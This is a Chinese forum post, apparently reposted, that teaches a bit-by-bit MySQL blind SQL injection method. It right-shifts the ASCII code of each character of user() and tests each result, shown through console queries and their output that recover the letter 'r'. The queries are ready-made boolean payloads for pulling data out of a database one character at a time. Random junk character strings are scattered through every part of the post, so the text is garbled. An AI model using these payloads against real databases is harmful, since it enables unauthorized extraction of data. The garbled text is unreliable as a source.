关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位

) U, m# @  b. Z0 G" N

2 m( |/ k: Y0 X. y( x, f% ?5 `( y7 O下面将以查询mysql数据库当中user()的第一位为例:
* b  }" ]5 p* ~# z( u( ~/ ]


# A! t4 t1 w' d! [2 W6 eps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)

: R1 u( ~0 g4 |! G1 o

首先执行如下sql语句:
2 }: b5 Y* O: Y

7 L* G% [6 |& J8 s
$ \7 Z2 h: u5 Y  O% {mysql> select (ascii((substr(user(),1,1))) >> 7)=0;
$ ]. N6 U& ?+ r5 B0 ~% V

# l5 y  p) ?$ Z
: I, M$ T/ X" N3 c/ v6 P2 p) u我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的

" {; Z! d1 L) [: _5 L) J9 z
* R1 _9 h6 }0 D& t9 b4 e
" W; C% N* W" b第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1



如果运算结果为1,说明第一位为0,不为1

/ m- C6 D" S$ j

( k+ ~, U3 ]8 V( ]9 l! G+————————————–+
0 @5 n$ J! O1 O8 W2 o" i3 K
  _4 p4 |) E# Q2 d3 p5 ~| (ascii((substr(user(),1,1))) >> 7)=0 |
( y4 [2 }$ O' W  L
+————————————–+

5 ^% k5 ?6 S9 d5 o' D1 m| 1 |
2 w1 D: `8 e8 T. A* y
/ L# S1 U- [% E' o1 H3 L$ Q3 j+————————————–+

2 O* x- E# L2 F9 Y1 row in set (0.00 sec)
8 C0 n( G: p4 x9 q/ ~
3 h4 [: c1 O! P% K* u这样我们就确定这个8bit的ascii的第一位为0


4 V  c0 P3 |: a, w3 J
$ P4 M. f% o! Q# Y9 S5 @: _: O9 I第二次我们来做6次右偏移来确定前两位

& o2 }: s4 R' q4 ~* e

3 E& l) J5 z, `0 W' ^4 [4 N前两位可能是01或00,即依然可以与0做比较,

mysql> select (ascii((substr(user(),1,1))) >> 6)=0;

7 z" ]4 X6 r; c  M9 O$ V+————————————–+
8 v1 c( F) {* o. i. l
5 y1 t. `( d9 ]' [3 b| (ascii((substr(user(),1,1))) >> 6)=0 |
. ~; V- X/ L- E9 Y8 ^, ]+ F3 z
# J' I4 a0 }2 c- q3 G+————————————–+

$ f4 G6 x, w4 A6 R" F, s+ ?| 0 |

" ?1 [; L/ q( o$ J# E" n8 S* W+————————————–+
8 R0 c) S+ |. _/ A! L
1 row in set (0.00 sec)
2 }" k0 K& r8 x- [
& z4 p/ r* K5 r$ c+ L9 m5 o
% u* O3 k! R$ K, B
: W% M$ f( Y! j& v结果为0,即第二位为1
: W+ `& Q2 {1 @! z) F- M


开始猜测前三位为010或011
& z3 y) `/ A+ A2 k
2 V6 v+ F2 L+ I" Z* X

+ F- r5 T7 {: J6 `$ F让我们看看010和011的ascii码是多少

  Y( U8 r9 |7 H% _) G4 m

- ^* K9 U% a. Q* f" p# N7 o' e$ _6 I分别查询select b’011′ select b’010′

7 t# _7 P% E/ u

8 s$ R" G9 p' R( ^8 D! O$ O' l获得结果 010 = 2 011 = 3

5 |0 B6 _0 ~4 y  D" I$ |* z

执行如下sql:
  g3 ~5 C+ X% M0 u6 K
) B% s. _2 d2 T  K
3 h! X) ?0 v4 \/ K
/ {! ?. O7 A. l$ mmysql> select (ascii((substr(user(),1,1))) >> 5)=2;
; y7 O4 |- e' m4 |8 q- `7 g0 D
$ U* P  u  [4 e9 F0 t8 P+————————————–+

! B, [# n* X. b" u8 N- h' X| (ascii((substr(user(),1,1))) >> 5)=2 |
- t* G3 b+ {. ^' I1 j
+————————————–+
' Y( B  p% [; ]/ Q
9 y$ k$ d% M6 }/ n8 z! m" k. p| 0 |

+————————————–+
; N0 A. Y$ k% {! W# J
即前三位不为010,而是011



# I, F  Z# D/ C/ W" ~" {/ c9 }$ ^直到获得最后一位
1 A) ^4 q4 C8 S4 p3 y* C

0 k, @* @4 w0 }( i2 c; E
最终结果为:01110010
7 j: F% V' n' {2 Z


转换一下:

3 j1 N, V+ x4 o9 Q; ~

; S9 x# a( R+ v/ S+ C7 L1 eselect b’01110010′
' O& q5 |, E9 P0 Z+ D


查询结果
* M  l( q5 C1 c  o4 r# ]/ f! A


+————-+

  K# q8 V* e6 R3 `- o| b’01110010′ |
+ M) I) P7 v# K, Y7 x3 E3 F
+————-+
6 `# J" ?$ W* ~+ j
; {5 _* c( C" J, T3 T: p( e8 o% g" }| r |
5 z8 ?* T% L( H4 K1 Y4 J
( m) k5 W' d, Y# x& ?+————-+
7 R- R% }) `% N* o" s9 v$ \1 E$ X
8 Z# {3 T  }' y) H1 m. v9 q/ o! ?+ J1 row in set (0.00 sec)
5 D/ |0 l+ T" M* Z7 C+ a) P
& w1 {8 `' _  {. {( F
  v1 {" U! y* e% C0 z
( d( G, o5 q1 v9 H这样我们就获得了user()的第一位.其它位依此类推